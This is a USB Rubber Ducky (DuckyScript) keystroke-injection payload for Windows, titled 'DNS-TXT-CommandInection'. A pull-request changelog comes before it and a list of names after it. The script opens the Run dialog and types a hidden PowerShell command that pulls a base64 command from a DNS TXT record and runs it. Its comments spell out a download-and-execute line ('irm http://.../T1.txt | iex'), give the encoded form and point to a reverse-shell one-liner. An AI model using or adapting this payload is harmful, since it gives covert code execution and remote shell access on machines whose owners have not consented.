Made changes requested from pull request. 1. Please remove this file as it is not needed. - removed .gitignore
2. I would recommend using a REM_BLOCK - added REM_BLOCK
3. I would include all of this in your readme.md it should contain all of this information. Having it in the payload clutters up the actually payload content. - Removed the clutter
4. If your target machine is windows you can use the PASSIVE_WINDOWS_DETECT extension. This extension will dynamically determine start delay and also ensure that the payload is ran on the correct OS. - added EXTENSION PASSIVE_WINDOWS_DETECT and updated the extension to new version. Ended up with the payload not executing.So, removed extension added in delay.
5. I would recommend using STRINGLN - added STRINGLN
6. also make sure to have a # before your DEFINE calls. #MY_TARGET_URL - added the # to MY_TARGET_URL
7. Why is this ps1 included? - removed ConvertBase64.ps1
8. Why is this file included? this is just a .txt of the powershellReverseShellOne-liner.ps1 file you uploaded. - removed T1.txt
REM Title: DNS-TXT-CommandInection
REM Author: Nate
REM Description: A usb rubber ducky payload that leverages DNS TXT records to perform command injection.
REM Windows Powershell is the CLI used by the payload. Replace the DNS TXT record for your domain with
REM the base64 encoded payload you have. See README.md for more details on converting your payload to base64
REM and an example of creating your DNS TXT record in AWS Route53 service.
REM Target: Windows 10, 11
REM Props: Hak5, Darren Kitchen, Korben
REM Version: 1.0
REM Category: Execution
REM CONFIGURATION
REM REQUIRED A domain with the ability to manipulate the DNS TXT records.
REM REQUIRED Web Server hosting the payload. In this example, python3 http.server was used to host a
REM reverseshell.
REM REQUIRED - Provide URL used for Example
DEFINE #MY_TARGET_URL example.com
REM Example: powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
REM Example of Decoded payload: "irm http://MY_TARGET_URL/T1.txt | iex"
REM NOTES: No base64 can be used as an alternative by replacing "$a=",";powershell -e $a" with just "|iex"
REM for the STRING payload below. Examples of the decoded command and encoded command are shown below to put
REM into DNS TXT record.
REM Decoded: "irm http://MY_TARGET_URL/T1.txt | iex"
REM Encoded: "aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA=="
REM ShoutOut: powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok. See link below.
REM https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3
REM The link below has the Powershell script to convert your payloads to Base64.
REM https://
DELAY 1000
GUI r
DELAY 1000
STRING powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
DELAY 500
ENTER
Yeet
Peaks
Alessandro Greco
Nate
Thomas Boeglin